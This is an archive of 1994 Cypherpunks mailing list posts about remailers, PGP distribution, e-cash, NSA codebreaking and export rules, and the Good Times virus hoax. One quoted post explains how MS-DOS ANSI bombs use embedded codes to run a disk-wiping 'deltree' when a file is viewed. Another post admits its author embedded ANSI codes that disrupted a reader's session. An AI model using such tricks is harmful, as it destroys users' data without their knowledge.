<199412071922.AA13633@xtropia> Message-ID: <199412072119.AA11687@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- X-To: sq0nk at alt.anonymous.messages >most remailers will not let you set the From: line this way. >could one of the remailer operators tell us why? >it doesn't make sense to me. I'm not going to install remailer software that would allow this because it'd make it even easier to post messages under someone else's name. I think that's rude and I'm not going to help other people do it. I think it's fine for people to refuse to identify themselves or to identify themselves with multiple names, but I don't like people using other folks' names, esp. in text-based media where the notionis of "identity" and "author" are awfully slippery in the first place. (Yes, I am aware that it's trivial to forge messages, and that widespread use of digital signatures would make the From: line essentially meaningless.) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuYmoH3YhjZY3fMNAQEgrgQAtm0KAK+lP4POZozsYrze0qGPityCOWJX VFsPCA+oobQiDNQtHdmTp9zyNB0rvjc1FyfZKtHICSiRx1FFQ3SGOP/Tzjx3hcsq hrJAWBojcklAba2R6OH/u8whfzcZWHbzmGU4n7VjrCTJvxyFkRkFlrfXzVWelveI IqLqpOAc0CE= =3cfj -----END PGP SIGNATURE----- From jim at acm.org Wed Dec 7 13:38:39 1994 From: jim at acm.org (Jim Gillogly) Date: Wed, 7 Dec 94 13:38:39 PST Subject: PGP 2.6.2 In-Reply-To: <94120808041708@nzdairy.co.nz> Message-ID: <9412072134.AA26120@mycroft.rand.org> > Tony.Gurnick at nzdairy.co.nz (DNA) writes: > I`m looking for an ftp site for pgp 2.6.2 or greater > outside of the us. Ive tried ftp.dsi.unimi.it but > they only have 2.6.1. It's dated 7 Nov in ftp.ox.ac.uk:pub/crypto/pgp/* -- is that earlier than MIT got it? Jim Gillogly Highday, 17 Foreyule S.R. 1994, 21:32 From rishab at dxm.ernet.in Wed Dec 7 14:22:14 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Wed, 7 Dec 94 14:22:14 PST Subject: Successful use of e-cash! Message-ID: I just made my first e-cash transaction. Using, SLIP and Netscape, I webbed to HotWired to uy a sneak preview of Bruce Sterling's Prague story to appear in the Jan issue for 0.50 cyberbucks. At the same time, I ran the e-cash client (for Windows) from DigiCash. It has a beautiful interface - just a few little icons visible on the screen; it went to the back, asked me for my password to open my account, found out what my balance was, and asked me whether I wanted to withdraw $10 from the total of $100. I said yes. Meanwhile I asked HotWired to send me the Sterling piece. Unfortunately it was too quick - it came in on port (something) before the e-cash client had filled my wallet; I tried again at HotWired, by which time the e-cash status showed $10. My cyberwallet made a nice clanging sound, asked me whether I wanted to pay "Wired Ecash Shop" $0.50, and whether I wanted to set a payment policy. I'm so smart - I told the client to automatically pay "Wired Ecash Shop" if it asked for less than $2 up to 10 times. Ouch! Now I can't go back up my Web trail! When I went one step back at HotWired, for some reason it ran the e-cash 'charge?' URL, and so 'clang' went my wallet and automatically deducted another 50c! Oops. Oh well, the whole experience was worth a whole cyberdollar. I also 'bought' Chaum's SciAm article, and got the reasonable lengthy list of shops. Then I noticed it was 4 in the morning... Rishab "We know everything about you that we need to know" - Coleta Brueck, IRS ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From Tony.Gurnick at nzdairy.co.nz Wed Dec 7 14:44:14 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Wed, 7 Dec 94 14:44:14 PST Subject: Breaking the NSA Message-ID: <94120811311055@nzdairy.co.nz> If you really want to test NSA. Encrypt some crypto code with pgp in an overseas public key(IE: non-us) then email the code to someone out of the us. This way you will find out 1 of 2 things. 1. That pgp is unbreakable by the NSA - Rsa with fairly log keys take so much work the nsa cant crack it with huge computers. This is a good thing - Idea, even though it is new, is a secure algorithm for the above reasons - You wont get in trouble as you are only sending random bits out of the country not code 2. PGP is BREAKABLE by the NSA (OUCH!) - You get in deep shit! or 3. PGP is breakable by the NSA but they dont tell anyone! (HMMM) - Well this would be an interesting one! - Since they are the ones that imposed the ITAR rule in the first place (them or the us gov) they have a prob! If they knew you were exporting crypto because they cracked pgp they could not convict you as that would imply they cracked pgp and they would tell the whole world what they can & cannot crack. It would be a big bummer for RSA and IDEA but at least we`d know! T From storm at marlin.ssnet.com Wed Dec 7 15:00:26 1994 From: storm at marlin.ssnet.com (Don Melvin) Date: Wed, 7 Dec 94 15:00:26 PST Subject: Announcing - The DigitaLiberty Forum In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , you wrote: > > *** Who can join DigitaLiberty? > > > > The DigitaLiberty Forum is open to anyone that can honestly answer yes to the > > following two questions: > > > > 1) I renounce the use of coercive force as a tool of social or economic > > policy. > > well, i guess i can't join! as a grad student all of you pay me (or my > advisor i should say) to learn how to cure all of this worlds awful > diseases...right. Same here. Except a bit of money I earned working in a video store, most every dollar I've gotten since 1981 has been from the Feds, directly or indirectly (FDIC, U.S.P.S., and gov't contractors). As a software engineer, the U.S. government is too large a market to ignore. I just look at it as my personal program of wealth re-distribution. Every dollar that goes to me (for value well received, I might add) is one that won't go to bolster rewards for imcompetency and laziness. - -- America - a country so rich and so strong we can reward the lazy and punish the productive and still survive (so far) Don Melvin storm at ssnet.com finger for PGP key. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBLuX+N7U8rMgiP9PxAQH/UgMAsN/6qQcfw4xft6S8LhvOs1BcacQBPvet fB1eYk8Elp25vS7TenxsGffmInX90tuVOXlIIdcJahJIhZG/rK/aKlZNAXfj3Mw7 B76WMhQlK8dtQDFXnAXzHisnWztEnX/v =dTYd -----END PGP SIGNATURE----- From loki at nately.UCSD.EDU Wed Dec 7 15:02:09 1994 From: loki at nately.UCSD.EDU (Lance Cottrell) Date: Wed, 7 Dec 94 15:02:09 PST Subject: Pr0duct Cypher: PGPtools. Message-ID: <9412072240.AA28355@nately.UCSD.EDU> -----BEGIN PGP SIGNED MESSAGE----- The error you mentioned is not my problem. I got the fix when I got PGPTools. I would really like you to look at the code I am using. Do you still have access to a Linux box? This communication with you using public groups and lists is a waste of bandwidth, and very slow. Could you send me an anonymous reply block? It is going to take forever for you to guess what my problem is without being able to look at the code directly, and I do not want to post the whole thing to cypherpunks. - ---------------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche - ---------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLuY51FVkk3dax7hlAQEd3gP+NnOcGoscIITPTHUQNztkSrYksjt3F9Qp WAuaelTX7UkkjvBjlLwyR2rASx0vXaGxsBmoAgWlyM1Z+87hqBK1EoCLFzN+Zt5b Vjx/GWsKo4QMro2DD8t7ppKKDUdcgK/7EgaaWGhKOXkmO5awf4IzxHIebeoqz/f6 UPwe3rnCVbY= =N8QE -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Wed Dec 7 15:02:54 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 7 Dec 94 15:02:54 PST Subject: Breaking the NSA In-Reply-To: <94120811311055@nzdairy.co.nz> Message-ID: <199412072305.SAA02362@hermes.bwh.harvard.edu> The NSA will not tell anyone if they can break RSA or IDEA. Read the Codebreakers; they went through all sorts of contortions to not let the Japanese know we had broken Purple. They may send the IRS, EPA, and other agencies after you to harrass you, but they wouldn't tell you just because you sent code out of the country. Alternately, they'll bug your computer, and claim thats how they broke things. Adam | If you really want to test NSA. Encrypt some crypto code | with pgp in an overseas public key(IE: non-us) then email the | code to someone out of the us. This way you will find out 1 of 2 | things. | 3. PGP is breakable by the NSA but they dont tell anyone! (HMMM) | | - Well this would be an interesting one! | | - Since they are the ones that imposed the ITAR rule in the | first place (them or the us gov) they have a prob! If | they knew you were exporting crypto because they cracked | pgp they could not convict you as that would imply they cracked | pgp and they would tell the whole world what they can & | cannot crack. It would be a big bummer for RSA and IDEA | but at least we`d know! From grendel at netaxs.com Wed Dec 7 15:11:03 1994 From: grendel at netaxs.com (Michael Handler) Date: Wed, 7 Dec 94 15:11:03 PST Subject: Anybody got a procmail recipe? In-Reply-To: Message-ID: On Wed, 7 Dec 1994, Samuel Kaplin wrote: > Does anyone have a procmail recipe which will forward all incoming mail > messages to a shell account to a specific usenet news group? Quick and dirty: :1: ^TO*@* ! group-name at cs.utexas.edu There's probably a better way, but that will work. -- Michael Handler Philadelphia, PA Civil Liberty Through Complex Mathematics s.s.y.g-l-b co-moderator You're only as elegant as your actions let you be From roy at cybrspc.mn.org Wed Dec 7 15:21:50 1994 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Wed, 7 Dec 94 15:21:50 PST Subject: ANSI Bombs are still a threat? (was: Re: Good times virus (ANSI BOMB?)) In-Reply-To: <199412070742.CAA21434@bb.hks.net> Message-ID: <941207.163507.7y7.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, adam.philipp at ties.org writes: > Although the concept of "text viruses" seems a bit far fetched to some > people, there these lovely toys known as ANSI bombs. Essentially they work > in a similar method to the some techniques used in the sendmail bug, but > they are MS-DOS specific, they will use embedded ANSI codes to run programs > as the files is viewed... The MS-DOS ANSI bomb relies on the capability of redefining keystrokes through the ANSI screen driver. Most all the DOS boxen I lay hands on lose this capability quickly, when I install more capable ANSI drivers that have this misfeature disabled. Fortunately, few people rely on ANSI-based text viewers, so I'd hope that even the otherwise unprotected machines have some immunity. (how many people use 'type filename' anymore?) I first learned of ANSI bombs back in the Cretacious period (1989), when it briefly became popular to slip them into PKZIP 0.92 comment fields. I even saw a couple in files I downloaded, because even then I had removed the function from my screen driver. The attempted redefs would show up as plain text. > If anyone feels the need for proof I collected a few a while back, but > really don't see the need to post them...heh heh. I wonder if anyone's mail readers are even succeptible? (he said, grinning) - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP public key available by mail echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org These are, of course, my opinions (and my machines) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuY7wBvikii9febJAQFE7AP/RObKGqQ0Usi9SRyM3TA5doewB9E/VVKs NOOGan6aPZrt0B0wGZRxvmYBDfSixc5LhmCvDBmSiQid3sxbtCZKAUdLqjic7N2F 6ypNktYtcaJgQ95DO9xqzPR42UxJN2GDLIuwX0/01Cu3x08tgu9R2FVoVgkvGMmF YggtpKNrUWk= =V3Nl -----END PGP SIGNATURE----- From VAMAGUS at delphi.com Wed Dec 7 15:42:25 1994 From: VAMAGUS at delphi.com (VAMAGUS at delphi.com) Date: Wed, 7 Dec 94 15:42:25 PST Subject: Breaking the NSA Message-ID: <01HKDEMI4HUQ91ZPHN@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- Tony.Gurnick at nzdairy.co.nz wrote: >If you really want to test NSA. Encrypt some crypto code >with pgp in an overseas public key(IE: non-us) then email the >code to someone out of the us. This way you will find out 1 of 2 >things. > 1. That pgp is unbreakable by the NSA > - Rsa with fairly log keys take so much work the nsa > cant crack it with huge computers. This is a good > thing Not that easy. They would just crack the code and *another* acronym based agency would come up with a different reason to seize you and your computer. It would seem unrelated to anyone but *you* since you would know what you did but would have no way to prove that your original infraction is why you are doin' time. Hope that makes some sense. > > - Idea, even though it is new, is a secure algorithm > for the above reasons > Same argument...no one would ever know either way. Until you got out in about 100 years. > > - You wont get in trouble as you are only sending > random bits out of the country not code If it isn't something *really good* they probably wouldn't come after you anyway. > > 2. PGP is BREAKABLE by the NSA (OUCH!) > - You get in deep shit! > > > or > > 3. PGP is breakable by the NSA but they dont tell anyone! (HMMM) #3 I can agree with. I don't think that NSA would tip their hand and let on to us that they can read our stuff. At least, not directly. > > - Well this would be an interesting one! > > - Since they are the ones that imposed the ITAR rule in the > first place (them or the us gov) they have a prob! If > they knew you were exporting crypto because they cracked > pgp they could not convict you as that would imply they cracked > pgp and they would tell the whole world what they can & > cannot crack. It would be a big bummer for RSA and IDEA > but at least we`d know! One more thing. Don't you think that they subscribe to the Cypherpunk list just to see this kind of logic? BTW....I ain't one of 'em, and I wouldn't tell if I was. :) ***************************Frenchie Sends******************************* * PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. * * As soon as any man says of the affairs of the state * * "What does it matter to me?" the state may be given up for lost. * * J.J.Rousseau - The Social Contract * * PGP info: email to mail-server at mit.edu with first line of message: * * send pub/usenet/alt.security.pgp/* * *****************************J. Francois******************************** -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuZF0LbmxeO+s+1xAQEGQwP+MjgH2uvJUXNAi8Cb1HMHZRTMjxAODSfr dfPS1SCbzCTzaQMSVCvfWS8hxfbnENGuDe3bhdhIJb0QzkuYWTmHFxpTydrTtJw+ U0OtB/O65JpNsisXEYF14FZ3hUBPqQ8NQ/TN4WV1dx6tROuWnoY1hYAOMM2pnZNY 0NBtz0MB1i0= =XpJK -----END PGP SIGNATURE----- From dave at esi.COM.AU Wed Dec 7 15:43:03 1994 From: dave at esi.COM.AU (Dave Horsfall) Date: Wed, 7 Dec 94 15:43:03 PST Subject: (Fwd) Read this, Virus info!! In-Reply-To: <199412070447.XAA18944@bb.hks.net> Message-ID: It's a hoax. Although, like a virus, this bloody warning has been infecting dozens of mailing lists... -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From farr at evtech.com Wed Dec 7 15:55:27 1994 From: farr at evtech.com (Rebecca Farr x260) Date: Wed, 7 Dec 94 15:55:27 PST Subject: crypto email to France Message-ID: <9412072357.AA00829@chuckwala> Hello - My company would like to be able to send encrypted mail to our office in Paris. Strictly inter-company stuff, using PGP for example. I know we can buy PGP here, and get it off the net in Europe, thereby avoiding exporting the technology in either direction... I've been told by someone here in the US that France wants control of any use of encryption software including sending email. I've also been told by someone in France that the agency in France is the Service Central de la Securite des Systemes d'Information (SCSSI), and that they want companies to register with them for use of cryptographic software. I've read what I can find on the net about legalities of using encryption software, and everything concerning Europe (what little there is) is quite vague. Does anyone here know any details or where I might find out more about what, if anything, needs to be done to legally exchange encrypted email with our office in Paris? Thanks very much! Best Regards, Rebecca Farr Evolutionary Technologies, Inc. Systems Administration Group 4301 Westbank Dr. Bldg. B, Suite 100 Austin, TX 778746 phone: 512-327-6994 x260 fax: 512-327-6117 email: farr at evtech.com From greg at ideath.goldenbear.com Wed Dec 7 15:59:00 1994 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Wed, 7 Dec 94 15:59:00 PST Subject: Bad PGP sig on 'Remailers and ##' Message-ID: <199412072358.AA14528@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Earlier I wrote: > I'm not going to install remailer software that would allow this > because it'd make it even easier to post messages under someone > else's name. [...] but the PGP sig on the message was bad, apparently because nn stuck an extra X-To: line in the message. Ugh. Anyway, I said it, and meant to say it. Thanks to the c-punk who caught that & sent me mail. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuZLpX3YhjZY3fMNAQHJWAP+Mk6jSgxGl5zpFDblnUeEfa94YtDaCNxr j9EWgI2lQzSsEqO2e5JRohBmXlQGxs8aPiKl3wGsRAcYAO6kYV3xfTQOfDbifT+9 sFP5/1wgO7I4cM3EdDgVtM7bYHUR44QebN/ONQxdDWi2+ErVfWh/PPR1u9DR2+wd c0v7rIRuuZc= =OvHk -----END PGP SIGNATURE----- -- "The anchored mind screwed into me by the psycho- | Greg Broiles lubricious thrust of heaven is the one that thinks | greg at goldenbear.com every temptation, every desire, every inhibition." | -- Antonin Artaud | @! From jrochkin at cs.oberlin.edu Wed Dec 7 16:02:42 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Wed, 7 Dec 94 16:02:42 PST Subject: Breaking the NSA Message-ID: At 6:31 PM 12/07/94, DNA wrote: >If you really want to test NSA. Encrypt some crypto code >with pgp in an overseas public key(IE: non-us) then email the >code to someone out of the us. This way you will find out 1 of 2 >things. > 1. That pgp is unbreakable by the NSA > - Rsa with fairly log keys take so much work the nsa > cant crack it with huge computers. This is a good > thing Nah, no possible result would tell you this. Perhaps PGP is "breakable", in that it takes something like 30 seconds of their computer time to break, say. But even 30 seconds would probably be too much time to spend on _every_ single piece of email that crosses national borders. From Tony.Gurnick at nzdairy.co.nz Wed Dec 7 17:13:22 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Wed, 7 Dec 94 17:13:22 PST Subject: Breaking the NSA Message-ID: <94120814043304@nzdairy.co.nz> Frenchie Wrote Not that easy. They would just crack the code and *another* acronym based agency would come up with a different reason to seize you and your computer. It would seem unrelated to anyone but *you* since you would know what you did but would have no way to prove that your original infraction is why you are doin' time. Hope that makes some sense. Maybe. What if the only way to do this was illegal? If it isn't something *really good* they probably wouldn't come after you anyway. Whats the definition of GOOD? #3 I can agree with. I don't think that NSA would tip their hand and let on to us that they can read our stuff. At least, not directly. We may as well find out. One more thing. Don't you think that they subscribe to the Cypherpunk list just to see this kind of logic? Maybe, But isnt freedom of speech what this list is about and what your constitution does! BTW....I ain't one of 'em, and I wouldn't tell if I was. :) Prove it T From VAMAGUS at delphi.com Wed Dec 7 18:22:42 1994 From: VAMAGUS at delphi.com (VAMAGUS at delphi.com) Date: Wed, 7 Dec 94 18:22:42 PST Subject: Breaking the NSA Message-ID: <01HKDJYCJYWI90QNJL@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- Tony.Gurnick at nzdairy.co.nz wrote: >Frenchie Wrote > > Not that easy. They would just crack the code and *another* > acronym based agency would come up with a different reason to > seize you and your computer. It would seem unrelated to anyone > but *you* since you would know what you did but would have no > way to prove that your original infraction is why you are doin' > time. Hope that makes some sense. > >Maybe. What if the only way to do this was illegal? Then you would have to hope you never do anything illegal. Then no (pick your acronym) agency would be able to easily trump up a charge that could be used as an infiltration technique to get to your system *legally*. If they want to bad enuff I'm sure breaking the law to catch you doing something would be arranged. Violating National Interests maybe? > If it isn't something *really good* they probably wouldn't come after > you anyway. >Whats the definition of GOOD? PGP?...3xDES?....RC5?....plans for an A-Bomb with instructions for construction and location of available nuclear material?...pick one. > #3 I can agree with. I don't think that NSA would tip their hand > and let on to us that they can read our stuff. At least, not directly. >We may as well find out. Agreed, the problem is finding a way to be sure! A little misinformation has a habit of going a long way. > One more thing. Don't you think that they subscribe to the Cypherpunk > list just to see this kind of logic? >Maybe, But isnt freedom of speech what this list is about and what your >constitution does! Be careful...not everyone here is a U.S. resident or citizen. At least I don't think so. But since I am I know how precariously balanced the definition of free specch is. The Supreme Court in cahoots with law enforcement and lawmakers could change things pretty quick! Throw in a handy list of names......u know the rest. > BTW....I ain't one of 'em, and I wouldn't tell if I was. :) >Prove it [I see my smiley was disregarded] Proof you say! A classical dilemma: If I say I am (one of them) it implies gathering intelligence or a reason to sow suspicion even if I am not. Denial implies I am what I say I am not. So, even though I am not, it would be impossible to *convince* you of that. If I was I still couldn't produce *believable* evidence to support the statement. Take my advice: Don't Trust Nobody. ***************************Frenchie Sends******************************* * PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. * * As soon as any man says of the affairs of the state * * "What does it matter to me?" the state may be given up for lost. * * J.J.Rousseau - The Social Contract * * PGP info: email to mail-server at mit.edu with first line of message: * * send pub/usenet/alt.security.pgp/* * *****************************J. Francois******************************** -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuZqibbmxeO+s+1xAQFLpwP7BiRyz2VD+gkBwE7F/yF99XPlYVjXYBsV wE6bJtGOQ94qojVYSlw/L2BXHwm271VqXgknKAxZbJUh/Y4497tnaRCVLx4Us91Z k/wrEWmnsB5uE2yNWcYuIMxMSRfrEhUAPNJUvl95+ryFm+7TC7kVKuPi/38+oKMS FCe0hmvbVDQ= =lt1q -----END PGP SIGNATURE----- Is there a reason *you* don't sign your messages? Hehehe.... :) From ianf at sydney.sgi.com Wed Dec 7 19:11:58 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Wed, 7 Dec 94 19:11:58 PST Subject: Breaking the NSA In-Reply-To: <94120811311055@nzdairy.co.nz> Message-ID: <9412081408.ZM999@wiley.sydney.sgi.com> On Dec 8, 11:31am, DNA wrote: > If you really want to test NSA. Encrypt some crypto code > with pgp in an overseas public key(IE: non-us) then email the > code to someone out of the us. This way you will find out 1 of 2 > things. [...] I am told that a similar trick was tried by some people back in the early 1980's, when they were trying to figure out if the NSA could indeed break DES. There was no official response to these attempts. Ian. From entropy at IntNet.net Wed Dec 7 21:44:30 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 7 Dec 94 21:44:30 PST Subject: Moto Secure Clear digital? In-Reply-To: <9412040430.AA29360@unicycle.cs.tulane.edu> Message-ID: > I just got a second phone line, and decided that if I was going to get a 2-line > phone it might as well be a good one, so I am considering a Motorola Secure > Clear cordless 2-line phone with speakerphone. This will be quite an investment,so I was wondering whether the Secure Clear phones are digitally encrypted or > merely scrambled using some analog method. Anybody know about this? How secure > are these phones really? --Wes As I understand it the system is a cheezy form of frequency inversion. It'll stop your neighbors with a scanner, but that's about it. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) From entropy at IntNet.net Wed Dec 7 21:46:57 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 7 Dec 94 21:46:57 PST Subject: NYT on Insecure Phones In-Reply-To: <199412040432.XAA13619@bb.hks.net> Message-ID: > It's worse than that! They will allow customers to use their service > in NYC, I'm told by a customer of their's visiting this weekend, if > they pay for the call with a credit card (IE, VISA, MC, etc) that they > must *give* *an* *operator* *over* *the* *cellphone*. Cell1 is just not incredibly smart about security, physical or otherwise. An aquaintance of mine found a "Fraud Alert Bulletin" in a Cellular One trash can which warned about the dangers of not shredding your trash. Of course, in the same bag was wads of credit card info, NAM & ESN info, etc. =jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) From alano at teleport.com Wed Dec 7 21:54:22 1994 From: alano at teleport.com (Alan Olsen) Date: Wed, 7 Dec 94 21:54:22 PST Subject: (Fwd) Read this, Virus info!! Message-ID: <199412080554.VAA23477@desiree.teleport.com> >I have received two versions of this warning about "Good Times" >virus, this one from mail list Design-L and a similar one from >list Fiction-of-Philosophy. Some forwarded headers have been >removed from this version. > >Has anyone on c'punks got further info or comment? Yes. It is a hoax. (I will obtain the debunking message fron one of the virus echos if needed...) It was designed to prey on the gulibility of AOL users. (You cannot make a mail message that will virus your system just by READING it. AOL does not have support for nam-shubs.) | "Encryption ROT13s your mind." | alano at teleport.com | |"Would you rather be tortured by the government | Disclaimer: | |forces or the people's liberation army?" -mklprc | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| From rsalz at osf.org Wed Dec 7 22:03:36 1994 From: rsalz at osf.org (Rich Salz) Date: Wed, 7 Dec 94 22:03:36 PST Subject: crypto email to France Message-ID: <9412080559.AA05774@sulphur.osf.org> Have your French office contact the American Consulate as a way of getting started. I believe the short and effective (albeit not 100% correct) answer is\ that digital privacy is not allowed unless you give the gov't the keys. /r$ From merriman at metronet.com Wed Dec 7 22:26:54 1994 From: merriman at metronet.com (David K. Merriman) Date: Wed, 7 Dec 94 22:26:54 PST Subject: Breaking the NSA Message-ID: <199412080627.AA02280@metronet.com> -----BEGIN PGP SIGNED MESSAGE----- > >Frenchie Wrote > > Not that easy. They would just crack the code and *another* > acronym based agency would come up with a different reason to > seize you and your computer. It would seem unrelated to anyone > but *you* since you would know what you did but would have no > way to prove that your original infraction is why you are doin' > time. Hope that makes some sense. > >Maybe. What if the only way to do this was illegal? Since when has that really stopped them? Or even slowed them down noticeably? > > > If it isn't something *really good* they probably wouldn't come after > you anyway. > >Whats the definition of GOOD? How about.... the Skipjack algorithm :-) > > #3 I can agree with. I don't think that NSA would tip their hand > and let on to us that they can read our stuff. At least not directly. > >We may as well find out. Knock yourself out. I got no desire to be Bubba's love toy..... > > One more thing. Don't you think that they subscribe to the Cypherpunk > list just to see this kind of logic? > > >Maybe But isnt freedom of speech what this list is about and what your >constitution does! Granted that's what the U.S. Constitution _started out_ as - no telling where things will end :-( > > > > BTW....I ain't one of 'em and I wouldn't tell if I was. :) > >Prove it Ri-i-i-i-i-ght! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuajTMVrTvyYOzAZAQF0bQP/YwIGyIsAEjZnyT1lIRSR25YUnTvT48cP vd9uDh/NYOHSrWtADj32bBQlenmQIF791P/VTZqjd1oxNgEzwLF8gZ4OgIUt6UQm URUapx0uUVRNQqD1SrNMH2RCJyh+pjJZryGif1AnJMqTUvlqvZDrHxCeDQ3qunah ZXIOGZvC+6w= =GtzR -----END PGP SIGNATURE----- - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From roy at cybrspc.mn.org Wed Dec 7 22:27:07 1994 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Wed, 7 Dec 94 22:27:07 PST Subject: My apologies to the list (Re: ANSI Bombs are still a threat?) In-Reply-To: <941207.163507.7y7.rusnews.w165w@cybrspc.mn.org> Message-ID: <941207.234039.2D7.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In trying to be too terribly clever, I included a bit of ANSI commands in my last post to the list. At least one person has suffered grevious harm to his telnet session as a result. That person asks that I post instructions for recovering from so heinous an attack. All I can suggest is escaping to a shell and doing a 'clear' (or, under MS-DOS, 'cls'). Sorry, folks. I won't do that again. - -- Roy M. Silvernail -- roy at cybrspc.mn.org "Usenet: It's all fun and games until somebody loses an eye." --Jason Kastner -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuadbBvikii9febJAQFl2AP/X+0X/qMqmTY4NgrItdUyrRx1ZNrI+nmS p423JUy9JS68uCfD7oE6cp0nEtMcr46kDsCgKd1lG8hnM8BaFpbOwRy4UgUDyVP7 LI1nvUfxW2PFZGs5QRJBJkGwShMkUai9C+8btd6nzgpxIpskt/7e5xwPR3YCQnro 6MvLHGXv/2o= =XcHI -----END PGP SIGNATURE----- From claborne at microcosm.sandiegoca.NCR.COM Wed Dec 7 22:33:01 1994 From: claborne at microcosm.sandiegoca.NCR.COM (Claborne, Chris) Date: Wed, 7 Dec 94 22:33:01 PST Subject: Good times virus (ANSI BOMB?) Message-ID: <2EE69EFD@microcosm.SanDiegoCA.NCR.COM> Can't be too UNIX centric. With the advent of MS Mail and CC:Mail that have SMTP gateways, they automagically convert uuencoded files to attachments in the native format. That is, when you send me a message with a uuencoded file at the end, my mail gateway uudecodes and puts the attachemnt in my mail messas as a clickable icon. NOW, all you got to do is convince me to doubble click on this (virus exe) and bingo!, I'm dead. Question: Has anyone tried to infect or destroy an NT box with some known virus. NT's security model could prevent this (I.E. trying to write to a restricted file or stay resident...). But I'm not sure what is secured since almost all users use NT workstation as "Administrator". 2 -- C -- >--------------------------------------------------------------------------- --- >-----BEGIN PGP SIGNED MESSAGE----- > >>On Dec 7, 1:04am, ADAM GERSTEIN, _THE_ MACGURU wrote: >>> Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" >>mean >>> anything to you? Sure, it wasn't actual email, but it did use email and >other >>> means of transport to cripple the net in a matter of hours. >> >>The Internet Worm used the sendmail DEBUG mode to execute commands on >>a remote system. It did not propogate itself via email messages, which was >>what the original (ridiculous) warning claimed. >> >>I can't feel a lot of sympathy for people who took this announcement >>seriously. Such stupidity reaps its own rewards. > >Although the concept of "text viruses" seems a bit far fetched to some >people, there these lovely toys known as ANSI bombs. Essentially they work >in a similar method to the some techniques used in the sendmail bug, but >they are MS-DOS specific, they will use embedded ANSI codes to run programs >as the files is viewed... anyone know what will happen if deltree /XXX >(where XXX represents an unpublished string of characters) is run from the >root directory of a DOS hard disk? Its gone, quickly. Sure the files can be >undeleted, but undeleting a whole disk is tricky business... > >Maybe Good Times is a hoax, but ANSI bombs exist and using a DOS ANSI text >viewer will surely be a foolish thing to do on any downloaded text file... > >If anyone feels the need for proof I collected a few a while back, but >really don't see the need to post them...heh heh. > > Adam Philipp > >PS: Please no comments about superiority of MACs or LINUX boxs because they >are immune to ANSI boms...that ought to be clear enough... > >- -- >PGP Key available on the keyservers. Encrypted E-mail welcome. > >SUB ROSA: Confidential, secret, not for publication. > -Black's Law Dictionary > >GJ/CS d H S:+ g? p? au+ a- w+ v++ c++ UL+ UU+ US+ P+ 3 E N++ k- W++ M-- V >po- Y++ t++ 5+ jx R G' tv+ b+++ D++ B--- E+++ u** h-- f++ r+ n+ y++-- > >- --- >[This message has been signed by an auto-signing service. A valid signature >means only that it has been received at the address corresponding to the >signature and forwarded.] > >-----BEGIN PGP SIGNATURE----- >Version: 2.6.2 >Comment: Gratis auto-signing service > >iQBFAwUBLuVnPSoZzwIn1bdtAQEjeAF+Pi65kg9SMBZ1bzO5gJBsumi5x2vJFgqC >o0hc3bMaqLYb5WY/jlaAtWURtzXzOUc6 >=/53s >-----END PGP SIGNATURE----- > From tony at secapl.com Thu Dec 8 06:17:48 1994 From: tony at secapl.com (Anthony Wm. Iannotti) Date: Thu, 8 